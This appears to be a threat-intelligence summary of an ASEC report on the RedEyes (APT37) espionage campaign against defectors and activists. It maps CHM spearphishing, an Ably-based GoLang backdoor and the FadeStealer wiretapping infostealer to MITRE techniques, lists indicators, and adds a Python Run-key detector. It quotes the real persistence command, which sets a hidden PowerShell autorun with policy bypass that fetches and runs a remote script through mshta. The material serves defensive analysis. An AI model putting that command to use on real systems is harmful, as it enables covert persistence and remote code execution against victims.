RedEyes (APT37/ScarCruft/Reaper) targeted individuals such as defectors and activists, using a CHM-based initial access chain and a GoLang backdoor that leverages the Ably real-time messaging platform for command-and-control, along with a wiretapping-infostealer called FadeStealer. The operation covered the full kill chain from spearphishing to privilege escalation, C2, and exfiltration, highlighting a modular, cloud-assisted approach to information theft. #RedEyes #APT37 #ScarCruft #FadeStealer #AblyGo #GoLang #GitHub #Wiretapping
Keypoints
- RedEyes targets specific individuals (defectors, activists, professors) and monitors their activities.
- May 2023 discovery of an Infostealer with wiretapping features and a GoLang backdoor using Ably for C2.
- Initial access via CHM files embedded in spear-phishing emails, masquerading as password-protected documents.
- PowerShell-based backdoor persistence, using an autorun registry key and MSHTA execution.
- AblyGo backdoor uses Ably cloud channels for command transmission (UP/DOWN messages) with a GitHub-stored authentication key.
- Exfiltration is staged with FadeStealer, which compresses data via an integrated RAR tool and stores data in %temp% folders before sending.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Initial access via CHM file disguised as a password file in spear-phishing emails. Quote: “The threat actor used a CHM (Compiled HTML Help File) file to carry out their initial breach. Similar to the case covered back in March, ‘Malware Distributed Disguised as a Password File’ [2], it is assumed that targets were approached via spear phishing emails with a normal password-protected document and a CHM malware disguised as a password file attached to them.”
- [T1218.005] Signed Binary Proxy Execution: Mshta – CHM content triggers MSHTA.exe to execute a malicious script from C&C. Quote: “the internal script code in the CHM shown in Figure 4 triggers MSHTA.exe to be executed, which causes a malicious script from the threat actor’s C&C server to be executed as well.”
- [T1059.001] PowerShell – Malicious script is PowerShell malware with persistence. Quote: “The malicious script obtained during the analysis was confirmed as PowerShell malware that maintains persistence through the use of an autorun registry key.”
- [T1547.001] Registry Run Keys/Startup Folder – Persistence via autorun registry key. Quote: “New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name kcJuWlrQO -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 569782 2.2.2.2 || mshta hxxp://172.93.181[.]249/control/html/1.html' -PropertyType String -Force;”
- [T1071.001] Web Protocols – C2 over Ably platform (GoLang) with channel authentication key. Quote: “The threat actor carried out later attack stages such as privilege escalation, exfiltration, and malware distribution through a backdoor that utilizes the Ably platform service which is based on GoLang.”
- [T1560.001] Archive Collected Data – Exfiltration uses a built-in RAR compression utility with password, archiving data at intervals. Quote: “compress the exfiltrated data from the infected PC at 30-minute intervals using a password.”
- [T1113] Screen Capture – Infostealer features include taking screenshots. Quote: “The executed Infostealer has various features, such as taking screenshots, exfiltrating data …”
- [T1056.001] Keyboard Input Capture – Keylogging as part of exfiltration features. Quote: “screenshots, exfiltrating data … keylogging, and wiretapping.”
- [T1123] Audio Capture – Wiretapping via microphone access. Quote: “wiretapping”, listed among the Infostealer's exfiltration features (microphone wiretapping).
- [T1025] Data from Removable Media – Exfiltrated data includes removable media. Quote: “Removable media device”, listed in the report's exfiltration table.
- [T1105] Ingress Tool Transfer – GoLang backdoor fetching and decoding of Ably authentication key from GitHub. Quote: “The GoLang backdoor accesses the GitHub URL that exists within its binary and retrieves the data that is in the ‘BASE64-encoded channel authentication key’ format…”
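As an added defensive example (not code from the ASEC report or this summary), the following Python script scans Windows Run-key values for the traits of the autorun command quoted under T1547.001: PowerShell with execution-policy bypass and a hidden window, `ping` with a long timeout used as a delay, and a `||` fallback to `mshta` that fetches a remote script. Both registry entries are constructed samples; the C2 address is the one published in the report, kept defanged as IoC feeds usually ship it.

```python
import re

# Constructed Run-key samples (not taken from a live system). The second entry mirrors
# the autorun command quoted in the report; the C2 URL stays defanged as published.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "kcJuWlrQO": (
        r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo "
        r"-NonInteractive -ep bypass ping -n 1 -w 569782 2.2.2.2 || "
        r"mshta hxxp://172.93.181[.]249/control/html/1.html"
    ),
}

# C2 address from the report, stored in defanged form.
KNOWN_C2 = {"172.93.181[.]249"}

# A ping timeout above this (milliseconds) is treated as a sleep, not a real probe.
PING_SLEEP_THRESHOLD_MS = 10_000


def refang(text: str) -> str:
    """Turn a defanged indicator/URL back into the form seen on a real host."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def analyze_run_value(value: str) -> list[str]:
    """Return the reasons a Run-key command resembles the RedEyes PowerShell loader."""
    v = refang(value)
    low = v.lower()
    reasons = []
    if re.search(r"-(?:ep|executionpolicy)\s+bypass", low):
        reasons.append("PowerShell execution-policy bypass")
    if re.search(r"-(?:w|windowstyle)\s+hidden", low):
        reasons.append("hidden PowerShell window")
    m = re.search(r"\bping(?:\.exe)?\s+-n\s+\d+\s+-w\s+(\d+)", low)
    if m and int(m.group(1)) > PING_SLEEP_THRESHOLD_MS:
        reasons.append(f"ping used as a delay timer (-w {m.group(1)} ms)")
    if re.search(r"\bmshta(?:\.exe)?\s+https?://", low):
        reasons.append("mshta launching a remote script")
    for ioc in KNOWN_C2:
        if refang(ioc) in v:
            reasons.append(f"known C2 address {ioc}")
    return reasons


def scan_run_keys(run_values: dict[str, str]) -> dict[str, list[str]]:
    """Map each suspicious Run-key value name to its list of findings."""
    return {name: r for name, val in run_values.items() if (r := analyze_run_value(val))}
```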
Indicators of Compromise
- [IP] – 172.93.181.249 – Ably/C2 server endpoint used for command transmission and data exfiltration.
- [MD5] – 1352abf9de97a0faf8645547211c3be7, 1c1136c12d0535f4b90e32aa36070682
- [File] – msedgeupdate.ini (3277e0232ed6715f2bae526686232e06), msedgeupdate.ini (3c475d80f5f6272234da821cc418a6f7)
- [File] – mfc42u.dll (59804449f5670b4b9b3b13efdb296abb)
- [File] – DESKTOP.lNl (f44bf949abead4af0966436168610bcc)
- [URL] – hxxp://172.93.181[.]249/control/data/, hxxp://172.93.181[.]249/file/, hxxp://172.93.181[.]249/control/html/1.html
- [Malware Family/Detection] – Trojan/Win.Goably.C5436296, Trojan/Win.Goably.C5422375, Trojan/Win.Loader.C5424444
- [CHM] – CHM-based initial access (Compiled HTML Help File)
Read more: https://asec.ahnlab.com/en/54349/